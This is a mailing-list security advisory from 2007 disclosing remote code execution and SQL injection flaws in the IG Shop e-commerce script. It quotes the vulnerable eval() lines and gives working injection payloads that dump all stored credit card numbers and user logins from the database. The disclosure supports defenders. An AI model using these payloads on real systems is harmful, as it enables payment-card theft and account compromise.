lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: 5 Jan 2007 05:51:37 -0000
Subject: IG Shop remote code execution

"If eval is the answer,  then you are asking the wrong question."

ig-shop suffers from two eval's that can be controlled by an attacker:;phpinfo();//
./cart.php line 692:
eval ("cart_$action();");;phpinfo();//
./page.php line 336:
eval ("page_$action();");

Dumps all credit card numbers:;$q=mysql_query(stripslashes($l));while($a=mysql_fetch_array($q)){print_r($a);}//&l=select%20*%20from%20orders
Some of these variables can be decoded using the unserlize()  funciton.

Dumps all logins:;$q=mysql_query(stripslashes($l));while($a=mysql_fetch_array($q)){print_r($a);}//&l=select%20*%20from%20users

sql injection works regardless of magic_quotes_gpc.
./compare_product.php line 11:
$qry_txt="select type_id from catalog_product where product_id=".$HTTP_GET_VARS[id];
Should have used quote marks. 

vendor's page:

By Michael Brooks. 

Powered by blists - more mailing lists